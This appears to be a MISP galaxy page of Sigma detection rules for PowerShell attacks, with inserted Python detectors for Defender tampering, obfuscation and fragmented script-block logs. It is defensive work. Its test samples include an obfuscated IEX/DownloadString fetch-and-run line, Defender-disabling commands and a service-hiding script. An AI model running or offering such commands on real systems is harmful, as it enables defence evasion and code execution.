author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/12/27
falsepositive ['Unknown']
filename posh_ps_copy_item_system_directory.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access', 'attack.t1556.002']
Related clusters

To see the related clusters, click here.

PowerShell WMI Win32_Product Install MSI

Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class

Internal MISP references

UUID 91109523-17f0-4248-a800-f81d9e7c081d which can be used as unique global reference for PowerShell WMI Win32_Product Install MSI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/04/24
falsepositive ['Unknown']
filename posh_ps_win32_product_install_msi.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.007']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation STDIN+ Launcher - Powershell

Detects Obfuscated use of stdin to execute PowerShell

Internal MISP references

UUID 779c8c12-0eb1-11eb-adc1-0242ac120002 which can be used as unique global reference for Invoke-Obfuscation STDIN+ Launcher - Powershell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Cheong, oscd.community
creation_date 2020/10/15
falsepositive ['Unknown']
filename posh_ps_invoke_obfuscation_stdin.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

PowerShell Remote Session Creation

Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system

Internal MISP references

UUID a0edd39f-a0c6-4c17-8141-261f958e8d8f which can be used as unique global reference for PowerShell Remote Session Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/06
falsepositive ['Legitimate administrative script']
filename posh_ps_remote_session_creation.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Extracting Information with PowerShell

Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.

Internal MISP references

UUID bd5971a7-626d-46ab-8176-ed643f694f68 which can be used as unique global reference for Extracting Information with PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/19
falsepositive ['Unknown']
filename posh_ps_susp_extracting.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.001']
Related clusters

To see the related clusters, click here.

Delete Volume Shadow Copies via WMI with PowerShell - PS Script

Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil

Internal MISP references

UUID e17121b4-ef2a-4418-8a59-12fb1631fa9e which can be used as unique global reference for Delete Volume Shadow Copies via WMI with PowerShell - PS Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/26
falsepositive ['Unknown']
filename posh_ps_susp_win32_shadowcopy.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.impact', 'attack.t1490']
Related clusters

To see the related clusters, click here.

Tamper Windows Defender - ScriptBlockLogging

Detects PowerShell scripts attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow.

Internal MISP references

UUID 14c71865-6cd3-44ae-adaa-1db923fae5f2 which can be used as unique global reference for Tamper Windows Defender - ScriptBlockLogging in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, elhoim, Tim Shelton (fps, alias support), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/01/16
falsepositive ['Legitimate PowerShell scripts that disable Windows Defender for troubleshooting purposes. Must be investigated.']
filename posh_ps_tamper_windows_defender_set_mp.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.
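The rule above matches on the Set-MpPreference and Add-MpPreference settings that turn Defender off or tell it to allow threats. The following is an added example, not the Sigma rule's own logic and not code from the MISP galaxy: it runs that check over a constructed 4104 ScriptBlockText and, beyond plain substring matching, resolves PowerShell's parameter prefix abbreviation (-DisableRea binds to -DisableRealtimeMonitoring, which a literal match on the full name would miss) and the [bool]/[int] spellings of "on". MP_PARAMS is a hand-picked subset of the cmdlet's parameters and the sample script block is constructed; both are assumptions for the demo.

```python
"""Spot Set-MpPreference / Add-MpPreference calls that weaken Defender.

Added example (not Sigma or MISP code). Prefix resolution is only correct
against the cmdlet's full parameter list; in production load it from
(Get-Command Set-MpPreference).Parameters.Keys instead of this subset.
"""
import re

# Assumption: a subset of Set-MpPreference parameter names, enough for the demo.
MP_PARAMS = [
    "DisableRealtimeMonitoring", "DisableBehaviorMonitoring",
    "DisableBlockAtFirstSeen", "DisableIOAVProtection",
    "DisableScriptScanning", "DisableArchiveScanning",
    "DisableIntrusionPreventionSystem", "DisableRemovableDriveScanning",
    "DisableRestorePoint", "DisableCatchupFullScan", "DisableCatchupQuickScan",
    "DisableEmailScanning", "DisablePrivacyMode",
    "MAPSReporting", "SubmitSamplesConsent", "ScanScheduleDay",
    "HighThreatDefaultAction", "LowThreatDefaultAction",
    "ModerateThreatDefaultAction", "SevereThreatDefaultAction",
    "ExclusionPath", "ExclusionExtension", "ExclusionProcess",
    "EnableControlledFolderAccess", "PUAProtection",
]

TRUE_VALUES = {"$true", "1", "true"}             # spellings of "on" seen in the wild
ALLOW_ACTIONS = {"allow", "6", "noaction", "9"}  # *ThreatDefaultAction enum: Allow=6, NoAction=9

INVOCATION_RE = re.compile(r"\b(Set|Add)-MpPreference\b([^|;\r\n]*)", re.IGNORECASE)
# -Name value  or  -Name:value ; the value is absent for switch parameters
ARG_RE = re.compile(r"-(\w+)(?:[\s:]+([^\s\-][^\s]*))?")


def resolve_param(name):
    """Map an exact or abbreviated parameter name to its canonical name.

    PowerShell binds any unambiguous prefix, so -DisableRea means
    -DisableRealtimeMonitoring. Unknown or ambiguous names give None.
    """
    low = name.lower()
    for p in MP_PARAMS:
        if p.lower() == low:
            return p
    cands = [p for p in MP_PARAMS if p.lower().startswith(low)]
    return cands[0] if len(cands) == 1 else None


def classify(cmdlet, param, value):
    """True when this parameter/value pair weakens protection."""
    if param.startswith("Disable"):
        return value in TRUE_VALUES
    if param.endswith("ThreatDefaultAction"):
        return value in ALLOW_ACTIONS
    if param == "MAPSReporting":
        return value in {"0", "disabled"}
    if param == "SubmitSamplesConsent":
        return value in {"2", "neversend"}
    if param == "ScanScheduleDay":
        return value in {"8", "never"}          # 8 = Never
    if param.startswith("Exclusion"):
        return cmdlet == "Add-MpPreference" and value != ""
    return False


def find_defender_tampering(script_text):
    """Return (cmdlet, canonical parameter, value) triples that weaken Defender."""
    findings = []
    for inv in INVOCATION_RE.finditer(script_text):
        cmdlet = inv.group(1).capitalize() + "-MpPreference"
        for arg in ARG_RE.finditer(inv.group(2)):
            param = resolve_param(arg.group(1))
            value = (arg.group(2) or "").strip("'\"").lower()
            if param and classify(cmdlet, param, value):
                findings.append((cmdlet, param, value))
    return findings


# Constructed ScriptBlockText, modelled on tampering one-liners; not a capture.
SAMPLE = r"""
Set-MpPreference -DisableRea $true -DisableScriptScan 1
Set-MpPreference -HighThreatDefaultAction Allow -ScanScheduleDay 8
Add-MpPreference -ExclusionPath 'C:\Users\Public'
Set-MpPreference -DisableArchiveScanning $false
"""

if __name__ == "__main__":
    for hit in find_defender_tampering(SAMPLE):
        print(hit)
```

The last sample line sets a Disable* parameter to $false and is deliberately not reported; a rule that keys only on the parameter name would flag it, which is the kind of false positive the rule's own note (troubleshooting scripts) warns about.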

Suspicious PowerShell WindowStyle Option

Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden

Internal MISP references

UUID 313fbb0a-a341-4682-848d-6d6f8c4fab7c which can be used as unique global reference for Suspicious PowerShell WindowStyle Option in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Tim Shelton (fp AWS)
creation_date 2021/10/20
falsepositive ['Unknown']
filename posh_ps_susp_windowstyle.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.003']
Related clusters

To see the related clusters, click here.

Powershell MsXml COM Object

Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code

Internal MISP references

UUID 78aa1347-1517-4454-9982-b338d6df8343 which can be used as unique global reference for Powershell MsXml COM Object in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, MatilJ
creation_date 2022/01/19
falsepositive ['Legitimate administrative script']
filename posh_ps_msxml_com.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Powershell Detect Virtualization Environment

Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox

Internal MISP references

UUID d93129cd-1ee0-479f-bc03-ca6f129882e3 which can be used as unique global reference for Powershell Detect Virtualization Environment in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Duc.Le-GTSC
creation_date 2021/08/03
falsepositive ['Unknown']
filename posh_ps_detect_vm_env.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1497.001']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell

Detects Obfuscated Powershell via COMPRESS OBFUSCATION

Internal MISP references

UUID 20e5497e-331c-4cd5-8d36-935f6e2a9a07 which can be used as unique global reference for Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2020/10/18
falsepositive ['Unknown']
filename posh_ps_invoke_obfuscation_via_compress.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Potential PowerShell Obfuscation Using Character Join

Detects specific techniques often seen inside PowerShell scripts to obfuscate alias creation

Internal MISP references

UUID e8314f79-564d-4f79-bc13-fbc0bf2660d8 which can be used as unique global reference for Potential PowerShell Obfuscation Using Character Join in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/09
falsepositive ['Unknown']
filename posh_ps_susp_alias_obfscuation.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1027', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.
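Both the "Powershell Token Obfuscation" rule earlier on this page and the "Character Join" rule above look for literal-rewriting tricks produced by Invoke-Obfuscation: 'I'+'E'+'X', [char]73, -join over a character list, "{1}{0}" -f, backticks inside tokens, and the & or . call operator applied to a string. The following is an added example, not code from the Sigma project or the MISP galaxy: a small static normaliser that folds those constructs back into plain tokens so an indicator list can be matched against the de-obfuscated text. The indicator list, the set of backtick escape characters preserved and the sample script blocks are assumptions made for the demo; the samples are constructed, not captured.

```python
"""Static normalisation of Invoke-Obfuscation token tricks (added example)."""
import re

STR = r"""(?:'[^']*'|"[^"]*")"""                      # quoted literal
CHAR = r"\[char\]\s*(?:0x[0-9a-f]+|\d+)"                # [char]73 / [char]0x49
ATOM = rf"(?:{STR}|{CHAR})"
LIST = rf"\(\s*{ATOM}(?:\s*,\s*{ATOM})*\s*\)"           # ('I','E','X')

ATOM_RE = re.compile(ATOM, re.I)
CONCAT_RE = re.compile(rf"{ATOM}(?:\s*\+\s*{ATOM})+", re.I)          # 'I'+[char]69+'X'
JOIN_RE = re.compile(rf"(?:-join\s*({LIST})|({LIST})\s*-join\s*(?:''|\"\"))", re.I)
FORMAT_RE = re.compile(rf"({STR})\s*-f\s*({ATOM}(?:\s*,\s*{ATOM})*)", re.I)  # "{1}{0}" -f 'EX','I'
UNWRAP_RE = re.compile(rf"(?<![\w\]])\(\s*({STR})\s*\)")   # ('IEX') but not .Method('x')
CALLOP_RE = re.compile(rf"[&.]\s*({STR})")                 # &'IEX' / .'IEX'
# Ticks before an escape character or a quoting metacharacter keep their
# meaning; every other backtick is noise inserted by the obfuscator
# (assumption: the escape set 0 a b f n r t u v is what is honoured).
TICK_RE = re.compile(r"`(?![0abfnrtuv\"'$`#])")

# Assumption: a short indicator list for the demo.
INDICATORS = ["iex", "invoke-expression", "downloadstring",
              "frombase64string", "invoke-webrequest"]


def _lit(tok):
    """Value of one atom: quoted literal -> its text, [char]N -> chr(N)."""
    tok = tok.strip()
    if tok[0] in "'\"":
        return tok[1:-1]
    num = tok[tok.index("]") + 1:].strip()
    return chr(int(num, 16) if num.lower().startswith("0x") else int(num))


def _quote(s):
    return "'" + s.replace("'", "''") + "'"


def _concat(m):
    return _quote("".join(_lit(t) for t in ATOM_RE.findall(m.group(0))))


def _join(m):
    return _quote("".join(_lit(t) for t in ATOM_RE.findall(m.group(1) or m.group(2))))


def _format(m):
    fmt = _lit(m.group(1))
    args = [_lit(a) for a in ATOM_RE.findall(m.group(2))]
    try:
        return _quote(re.sub(r"\{(\d+)\}", lambda n: args[int(n.group(1))], fmt))
    except IndexError:            # malformed -f expression: leave it alone
        return m.group(0)


def normalise(script_text):
    """Apply the rewrite passes until the text stops changing.

    Several passes are needed because one trick is often nested in another
    (a [char] concatenation used as an argument to -f, for instance).
    """
    text, prev = script_text, None
    while text != prev:
        prev = text
        text = TICK_RE.sub("", text)
        text = CONCAT_RE.sub(_concat, text)
        text = JOIN_RE.sub(_join, text)
        text = FORMAT_RE.sub(_format, text)
        text = UNWRAP_RE.sub(r"\1", text)
        text = CALLOP_RE.sub(lambda m: _lit(m.group(1)), text)
    return text


def suspicious_tokens(script_text):
    """Indicators visible in the de-obfuscated text, as lower-case names."""
    norm = normalise(script_text).lower()
    return sorted(i for i in INDICATORS if re.search(rf"\b{re.escape(i)}\b", norm))


# Constructed script blocks, not captures.
SAMPLES = {
    "charjoin": "&( ('I','E','X') -join '' ) (New-Object Net.WebClient).DownloadString('http://127.0.0.1/p.ps1')",
    "format_char": """.("{1}{0}" -f ([char]69+[char]0x58),'I') 'whoami'""",
    "ticks_join": "I`Ex (-join ('[','Convert]::','From','Base64String'))",
    "benign": r"Get-ChildItem -Path C:\Windows\Temp | Where-Object { $_.Length -gt 1MB }",
}

if __name__ == "__main__":
    for name, block in SAMPLES.items():
        print(f"{name:12} {suspicious_tokens(block)}  <- {normalise(block)}")
```

The rewrite is purely textual, so it deliberately leaves anything it does not recognise untouched (variables, method calls, [string]::Join) rather than guessing; those forms are where the "Unknown" false-positive rating of the rule above comes from and are better handled by the Sigma pattern itself.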

PowerView PowerShell Cmdlets - ScriptBlock

Detects Cmdlet names from PowerView of the PowerSploit exploitation framework.

Internal MISP references

UUID dcd74b95-3f36-4ed9-9598-0490951643aa which can be used as unique global reference for PowerView PowerShell Cmdlets - ScriptBlock in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2021/05/18
falsepositive ['Unknown']
filename posh_ps_powerview_malicious_commandlets.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

PowerShell Create Local User

Detects creation of a local user via PowerShell

Internal MISP references

UUID 243de76f-4725-4f2e-8225-a8a69b15ad61 which can be used as unique global reference for PowerShell Create Local User in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @ROxPinTeddy
creation_date 2020/04/11
falsepositive ['Legitimate user creation']
filename posh_ps_create_local_user.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.persistence', 'attack.t1136.001']
Related clusters

To see the related clusters, click here.

PSAsyncShell - Asynchronous TCP Reverse Shell

Detects the use of PSAsyncShell, an asynchronous TCP reverse shell written in PowerShell

Internal MISP references

UUID afd3df04-948d-46f6-ae44-25966c44b97f which can be used as unique global reference for PSAsyncShell - Asynchronous TCP Reverse Shell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/04
falsepositive ['Unlikely']
filename posh_ps_psasyncshell.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Powershell Exfiltration Over SMTP

Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Internal MISP references

UUID 9a7afa56-4762-43eb-807d-c3dc9ffe211b which can be used as unique global reference for Powershell Exfiltration Over SMTP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/09/26
falsepositive ['Legitimate script']
filename posh_ps_send_mailmessage.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.exfiltration', 'attack.t1048.003']
Related clusters

To see the related clusters, click here.

Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell

Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file

Internal MISP references

UUID db885529-903f-4c5d-9864-28fe199e6370 which can be used as unique global reference for Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/11/17
falsepositive ["Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often"]
filename posh_ps_computer_discovery_get_adcomputer.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1033']
Related clusters

To see the related clusters, click here.

Potential Persistence Via PowerShell User Profile Using Add-Content

Detects calls to "Add-Content" cmdlet in order to modify the content of the user profile and potentially adding suspicious commands for persistence

Internal MISP references

UUID 05b3e303-faf0-4f4a-9b30-46cc13e69152 which can be used as unique global reference for Potential Persistence Via PowerShell User Profile Using Add-Content in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/08/18
falsepositive ['Legitimate administration and tuning scripts that aim to add functionality to a user PowerShell session']
filename posh_ps_user_profile_tampering.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1546.013']
Related clusters

To see the related clusters, click here.

Abuse of Service Permissions to Hide Services Via Set-Service - PS

Detects usage of the "Set-Service" PowerShell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service" etc. (works only in PowerShell 7)

Internal MISP references

UUID 953945c5-22fe-4a92-9f8a-a9edc1e522da which can be used as unique global reference for Abuse of Service Permissions to Hide Services Via Set-Service - PS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/17
falsepositive ['Rare intended use of hidden services', 'Rare FP could occur due to the non linearity of the ScriptBlockText log']
filename posh_ps_using_set_service_to_hide_services.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.011']
Related clusters

To see the related clusters, click here.
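The false-positive note above points at a real detection pitfall: PowerShell logs a long script block as several Event ID 4104 records that share a ScriptBlockId and carry MessageNumber/MessageTotal fields, and a keyword-AND detection evaluated on each fragment alone can miss. The following is an added example, not code from this page or from the Sigma project, showing why fragments should be reassembled before matching. The keyword set is my own reading of the rule description (cmdlet, SDDL parameter, and the deny-ACE rights string used to hide a service), and the fragment records are constructed for this demonstration.

```python
"""
Reassemble fragmented PowerShell 4104 script-block events before matching.

Added example (not from the MISP page or the Sigma project). Events are
constructed; the keyword set approximates the "hide service" detection above.
"""
from collections import defaultdict

# My reading of the rule: cmdlet + SDDL parameter + the deny-ACE rights string
# (Sigma `contains|all` semantics: every keyword must be present).
HIDE_SERVICE_KEYWORDS = ("Set-Service", "-SecurityDescriptorSddl", "DCLCWPDTSD")

# Constructed fragments in the shape of parsed 4104 records. The three parts of
# block "b7c1" arrive out of order, which is what the rule's FP note alludes to.
FRAGMENTS = [
    {"ScriptBlockId": "b7c1", "MessageNumber": 2, "MessageTotal": 3,
     "ScriptBlockText": "-SecurityDescriptorSddl 'D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)"},
    {"ScriptBlockId": "b7c1", "MessageNumber": 1, "MessageTotal": 3,
     "ScriptBlockText": "$n = 'UpdaterSvc'\nNew-Service -Name $n -BinaryPathName 'C:\\ProgramData\\u.exe'\nSet-Service -Name $n "},
    {"ScriptBlockId": "b7c1", "MessageNumber": 3, "MessageTotal": 3,
     "ScriptBlockText": "(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)'\nStart-Service $n"},
    {"ScriptBlockId": "0e22", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Get-Service | Where-Object Status -eq 'Running'"},
    # an incomplete block: only 1 of 2 fragments has been received so far
    {"ScriptBlockId": "c3d4", "MessageNumber": 1, "MessageTotal": 2,
     "ScriptBlockText": "Set-Service -Name Spooler "},
]


def contains_all(text: str, keywords) -> bool:
    """Case-insensitive AND over the keyword list, like Sigma's contains|all."""
    t = text.lower()
    return all(k.lower() in t for k in keywords)


def per_fragment_hits(fragments, keywords=HIDE_SERVICE_KEYWORDS):
    """Naive approach: evaluate each 4104 record on its own."""
    return sorted({f["ScriptBlockId"] for f in fragments
                   if contains_all(f["ScriptBlockText"], keywords)})


def reassemble(fragments) -> dict:
    """Group records by ScriptBlockId, order by MessageNumber, and emit only
    complete blocks; incomplete ones are held back until all parts arrive."""
    groups = defaultdict(dict)
    for f in fragments:
        groups[f["ScriptBlockId"]][f["MessageNumber"]] = f
    complete = {}
    for sbid, parts in groups.items():
        total = next(iter(parts.values()))["MessageTotal"]
        if set(parts) != set(range(1, total + 1)):
            continue  # still waiting for fragments
        complete[sbid] = "".join(parts[i]["ScriptBlockText"] for i in range(1, total + 1))
    return complete


def reassembled_hits(fragments, keywords=HIDE_SERVICE_KEYWORDS):
    """Correct approach: match against the reassembled script block text."""
    return sorted(sbid for sbid, text in reassemble(fragments).items()
                  if contains_all(text, keywords))


if __name__ == "__main__":
    print("per-fragment :", per_fragment_hits(FRAGMENTS))   # misses the hidden-service block
    print("reassembled  :", reassembled_hits(FRAGMENTS))    # finds b7c1
```

In a SIEM the same idea is a correlation keyed on ScriptBlockId with a short hold time; blocks that never complete (the c3d4 case) should age out rather than be matched partially.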

Suspicious PowerShell Invocations - Generic

Detects suspicious PowerShell invocation command parameters

Internal MISP references

UUID ed965133-513f-41d9-a441-e38076a0798f which can be used as unique global reference for Suspicious PowerShell Invocations - Generic in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/12
falsepositive ['Very special / sneaky PowerShell scripts']
filename posh_ps_susp_invocation_generic.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

SyncAppvPublishingServer Execution to Bypass Powershell Restriction

Detects SyncAppvPublishingServer process execution, which is commonly used by adversaries to bypass PowerShell execution restrictions.

Internal MISP references

UUID dddfebae-c46f-439c-af7a-fdb6bde90218 which can be used as unique global reference for SyncAppvPublishingServer Execution to Bypass Powershell Restriction in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ensar Şamil, @sblmsrsn, OSCD Community
creation_date 2020/10/05
falsepositive ['App-V clients']
filename posh_ps_syncappvpublishingserver_exe.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Automated Collection Command PowerShell

Once established within a system or network, an adversary may use automated techniques for collecting internal data.

Internal MISP references

UUID c1dda054-d638-4c16-afc8-53e007f3fbc5 which can be used as unique global reference for Automated Collection Command PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/28
falsepositive ['Unknown']
filename posh_ps_automated_collection.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.collection', 'attack.t1119']
Related clusters

To see the related clusters, click here.

Windows Firewall Profile Disabled

Detects when a user disables the Windows Firewall via a Profile to help evade defense.

Internal MISP references

UUID 488b44e7-3781-4a71-888d-c95abfacf44d which can be used as unique global reference for Windows Firewall Profile Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/10/12
falsepositive ['Unknown']
filename posh_ps_windows_firewall_profile_disabled.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

Manipulation of User Computer or Group Security Principals Across AD

Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services, where access and permissions are configured across systems and services that are part of that domain.

Internal MISP references

UUID b29a93fb-087c-4b5b-a84d-ee3309e69d08 which can be used as unique global reference for Manipulation of User Computer or Group Security Principals Across AD in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/28
falsepositive ['Legitimate administrative script']
filename posh_ps_directoryservices_accountmanagement.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.persistence', 'attack.t1136.002']
Related clusters

To see the related clusters, click here.

Potential Data Exfiltration Via Audio File

Detects potential exfiltration attempt via audio file using PowerShell

Internal MISP references

UUID e4f93c99-396f-47c8-bb0f-201b1fa69034 which can be used as unique global reference for Potential Data Exfiltration Via Audio File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/16
falsepositive ['Unknown']
filename posh_ps_audio_exfiltration.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.exfiltration']

Disable Powershell Command History

Detects scripts or commands that disable the PowerShell command history by removing the PSReadLine module

Internal MISP references

UUID 602f5669-6927-4688-84db-0d4b7afb2150 which can be used as unique global reference for Disable Powershell Command History in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ali Alwashali
creation_date 2022/08/21
falsepositive ['Legitimate script that disables the command history']
filename posh_ps_disable_psreadline_command_history.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.003']
Related clusters

To see the related clusters, click here.

Powershell Keylogging

Adversaries may log user keystrokes to intercept credentials as the user types them.

Internal MISP references

UUID 34f90d3c-c297-49e9-b26d-911b05a4866c which can be used as unique global reference for Powershell Keylogging in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/30
falsepositive ['Unknown']
filename posh_ps_keylogging.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.collection', 'attack.t1056.001']
Related clusters

To see the related clusters, click here.

Access to Browser Login Data

Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.

Internal MISP references

UUID fc028194-969d-4122-8abe-0470d5b8f12f which can be used as unique global reference for Access to Browser Login Data in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/30
falsepositive ['Unknown']
filename posh_ps_access_to_browser_login_data.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access', 'attack.t1555.003']
Related clusters

To see the related clusters, click here.

Suspicious PowerShell Mailbox Export to Share - PS

Detects usage of the PowerShell New-MailboxExportRequest cmdlet to export a mailbox to a remote or local share, as used in ProxyShell exploitation

Internal MISP references

UUID 4a241dea-235b-4a7e-8d76-50d817b146c4 which can be used as unique global reference for Suspicious PowerShell Mailbox Export to Share - PS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/26
falsepositive ['Unknown']
filename posh_ps_mailboxexport_share.yml
level critical
logsource.category ps_script
logsource.product windows
tags ['attack.exfiltration']

Import PowerShell Modules From Suspicious Directories

Detects powershell scripts that import modules from suspicious directories

Internal MISP references

UUID 21f9162c-5f5d-4b01-89a8-b705bd7d10ab which can be used as unique global reference for Import PowerShell Modules From Suspicious Directories in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/07
falsepositive ['Unknown']
filename posh_ps_import_module_susp_dirs.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Powershell Sensitive File Discovery

Detects adversaries enumerating sensitive files

Internal MISP references

UUID 7d416556-6502-45b2-9bad-9d2f05f38997 which can be used as unique global reference for Powershell Sensitive File Discovery in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/09/16
falsepositive ['Unknown']
filename posh_ps_sensitive_file_discovery.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1083']
Related clusters

To see the related clusters, click here.

PowerShell Script With File Hostname Resolving Capabilities

Detects PowerShell scripts that have capabilities to read files, loop through them and resolve DNS host entries.

Internal MISP references

